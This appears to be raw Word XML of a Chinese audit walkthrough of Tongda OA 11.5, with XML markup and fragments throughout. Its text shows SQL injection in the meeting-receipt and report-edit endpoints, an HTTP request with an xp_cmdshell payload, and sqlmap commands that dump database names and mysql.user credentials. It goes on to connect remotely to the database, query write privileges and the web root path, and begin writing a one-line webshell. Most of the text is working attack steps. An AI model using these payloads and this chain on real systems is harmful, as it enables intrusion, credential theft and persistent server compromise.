      <w:r w:rsidRPr="00470D3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审计版本：通达OA 11.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43720BC9" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="right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093B0400" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470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470D35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POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&amp;id=5&amp;nosign=true&amp;reminding=trueX-Resource-Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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lastRenderedPageBreak/>
        <w:t>xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 97x-wvs-id: Acunetix-Deepscan/186Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>m_id=5&amp;join_flag=2&amp;remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38152FA5" w14:textId="261E31B4" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D35">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D1E77B1" wp14:editId="414A1FF6">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="13" name="矩形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7AC09" id="矩形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PODx6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 w:rsidR="00F476ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B39971" wp14:editId="351CADF5">
            <wp:extent cx="5274310" cy="10026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96E6" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D35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br/>
        <w:t>漏洞文件：webroot\general\appbuilder\modules\meeting\models\MeetingReceipt.php。漏洞存在于$remark=$data['remark']; 与$form-&gt;REMARK = $remark; 可以看到remark参数没有过滤，直接拼接到insert语句中造成的注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696B3BF" w14:textId="6B827713" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D35">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E2AAF2" wp14:editId="3787B12F">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="12" name="矩形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BC4BF5" id="矩形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yKB8L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 w:rsidR="00F476ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4038F0E2" wp14:editId="15F4552B">
            <wp:extent cx="5274310" cy="20383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1485" w14:textId="77777777" w:rsidR="00A03F53" w:rsidRPr="00B959E6" w:rsidRDefault="00A03F53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2866B5FA" w14:textId="77777777" w:rsidR="00192F2F" w:rsidRDefault="005003D3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登录通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，为方便测试，这里用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00F40B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，然后这里用</w:t>
      </w:r>
      <w:r w:rsidR="00F40B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00F40B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="002600BD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B40624">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="002600BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="006C15B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006C15B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidR="006C15B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中直接构造</w:t>
      </w:r>
      <w:r w:rsidR="00B40624">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00B40624">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00192F2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>型</w:t>
      </w:r>
      <w:r w:rsidR="00192F2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27B7FD" w14:textId="33ADAA30" w:rsidR="000F53EF" w:rsidRDefault="00B40624" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A9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/general/appbuilder/web/report/repdetail/edit?link_type=false&amp;slot={}&amp;id=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730E7B3F" w14:textId="469235D5" w:rsidR="005003D3" w:rsidRDefault="00F679E1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A365134" wp14:editId="1F6D31E6">
            <wp:extent cx="5274310" cy="1701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AB6" w14:textId="744A8CFF" w:rsidR="001D6BA4" w:rsidRDefault="00426F7C" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426F7C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/general/appbuilder/web/report/repdetail/edit?link_type=false&amp;slot={}&amp;id=2%20or%201=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821986F" w14:textId="7EC50B93" w:rsidR="001D6BA4" w:rsidRDefault="00FB7227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21016" wp14:editId="0C84D8CE">
            <wp:extent cx="5274310" cy="27095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F4D8" w14:textId="7A63ACEF" w:rsidR="00DE5B5B" w:rsidRDefault="00AC0FAF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将请求保存问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txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，然后用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>跑</w:t>
      </w:r>
      <w:r w:rsidR="00D755D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，可以成功跑出数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE3965" w14:textId="401B1D11" w:rsidR="0038523B" w:rsidRPr="0038523B" w:rsidRDefault="0038523B" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038523B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python sqlmap.py -r 1.txt --dbms=mysql --threads=10 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DEE33B" w14:textId="5B3525C4" w:rsidR="00DE5B5B" w:rsidRDefault="00AD6B5D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0F6C9AA" wp14:editId="4DFE5480">
            <wp:extent cx="5274310" cy="42386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4E32" w14:textId="3075F3D8" w:rsidR="00DE5B5B" w:rsidRDefault="00CB7103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然后用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>跑出登录账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38186130" w14:textId="3A66FAC7" w:rsidR="005827E8" w:rsidRDefault="005827E8" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005827E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">python sqlmap.py -r 1.txt --dbms=mysql --threads=10 --dbs -D mysql -T user -C </w:t>
      </w:r>
      <w:r w:rsidR="00CE2C86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C86">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005827E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user,password --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13193E98" w14:textId="13FF120D" w:rsidR="00DE5B5B" w:rsidRDefault="00544D2F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B6449C0" wp14:editId="00E821E6">
            <wp:extent cx="5274310" cy="22218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0F69" w14:textId="73498B4D" w:rsidR="00DE5B5B" w:rsidRDefault="00E20A3E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发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>表示可以远程连接，然后远程连接数据库</w:t>
      </w:r>
      <w:r w:rsidR="007F6EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009473C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>通达</w:t>
      </w:r>
      <w:r w:rsidR="009473C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r w:rsidR="009473C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>数据库使用的是</w:t>
      </w:r>
      <w:r w:rsidR="009473C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="009473C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007F6EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>更改了默认端口号，端口</w:t>
      </w:r>
      <w:r w:rsidR="007F6EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007F6EAB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>336</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67720FFE" w14:textId="31071718" w:rsidR="00AF5EA4" w:rsidRDefault="00AF5EA4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Navicat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>连接数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780DB308" w14:textId="13052EE5" w:rsidR="009B515A" w:rsidRDefault="00DA6442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4CAA0" wp14:editId="48EF13D8">
            <wp:extent cx="5274310" cy="62344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C244" w14:textId="4CE5AC53" w:rsidR="00372484" w:rsidRDefault="00671CD6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执行查询，查看数据库版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671CD6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SHOW VARIABLES LIKE 'version';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41824B7B" w14:textId="01B077B7" w:rsidR="00372484" w:rsidRDefault="008C29EA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ED551C" wp14:editId="50E704C4">
            <wp:extent cx="3486150" cy="16097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8384" w14:textId="7759D6BA" w:rsidR="00372484" w:rsidRDefault="00D61450" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61450">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查看是否可以数据库写入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outfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F9EAC" w14:textId="08DD09E9" w:rsidR="00D61450" w:rsidRDefault="00D61450" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61450">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>show variables like '%sec%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1F3C2" w14:textId="453CE818" w:rsidR="00B10AE8" w:rsidRDefault="00B10AE8" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B10AE8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>secure_file_priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为空表示可以任意位置写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961D198" w14:textId="1F27F94D" w:rsidR="00CE2C86" w:rsidRDefault="00001B75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B93C913" wp14:editId="4F95D064">
            <wp:extent cx="3362325" cy="17907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26BC" w14:textId="0FC83BA4" w:rsidR="00991919" w:rsidRDefault="00991919" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991919">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>查看有数据库写入权限的用户</w:t>
      </w:r>
      <w:r w:rsidR="00AC06D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，可以看到</w:t>
      </w:r>
      <w:r w:rsidR="00AC06D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00AC06D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>有权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE100B" w14:textId="32BBE1D8" w:rsidR="00991919" w:rsidRDefault="00991919" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991919">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">select group_concat(user,0x3a,file_priv) from mysql.user;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18987DBD" w14:textId="29D13B41" w:rsidR="00CE2C86" w:rsidRDefault="001056C9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ADAF54B" wp14:editId="31290634">
            <wp:extent cx="5274310" cy="17868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BB58" w14:textId="77777777" w:rsidR="00641DA8" w:rsidRPr="00641DA8" w:rsidRDefault="00641DA8" w:rsidP="00641DA8">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的安装路径，以下两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任意一个可查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0D7D6" w14:textId="77777777" w:rsidR="00641DA8" w:rsidRPr="00641DA8" w:rsidRDefault="00641DA8" w:rsidP="00641DA8">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>select @@basedir as basePath from dual ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419FA1A" w14:textId="728527C6" w:rsidR="00A14674" w:rsidRDefault="00641DA8" w:rsidP="00641DA8">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00641DA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>show variables like '%basedir%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64795D7D" w14:textId="4F0F31C1" w:rsidR="00A14674" w:rsidRDefault="007A0E81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6CA59F" wp14:editId="771A9754">
            <wp:extent cx="4219575" cy="18097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BC64" w14:textId="77777777" w:rsidR="00EA0094" w:rsidRDefault="00926EBB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可以得知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安装路径</w:t>
      </w:r>
      <w:r w:rsidRPr="0090365B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C:\TDOA11.5\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mysql5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。因为通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>自带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数据库所以可以知道通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的安装路径是</w:t>
      </w:r>
      <w:r w:rsidRPr="0090365B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C:\TDOA11.5\</w:t>
      </w:r>
      <w:r w:rsidR="00EA0094">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22181692" w14:textId="79DD2865" w:rsidR="00EA0094" w:rsidRDefault="00EA0094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通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的目录结构一般是这样的，如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34639BE9" w14:textId="697102E6" w:rsidR="008C79F2" w:rsidRDefault="00944B99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F891A9B" wp14:editId="39CE791C">
            <wp:extent cx="4810125" cy="2486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4613" w14:textId="1B2517F0" w:rsidR="0090365B" w:rsidRDefault="00EA0094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w:r w:rsidR="0090365B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>可知通达</w:t>
      </w:r>
      <w:r w:rsidR="0090365B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r w:rsidR="0090365B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0090365B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0090365B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidR="0090365B" w:rsidRPr="0090365B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C:\TDOA11.5\webroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB911E4" w14:textId="78ED5A9B" w:rsidR="0090365B" w:rsidRDefault="000B1434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数据库写入一句话</w:t>
      </w:r>
      <w:r w:rsidR="00EA5E37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，路径一定要加双斜杠，否则斜杠会被默认转义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E078A" w14:textId="0696DD8C" w:rsidR="00343D68" w:rsidRDefault="00343D68" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
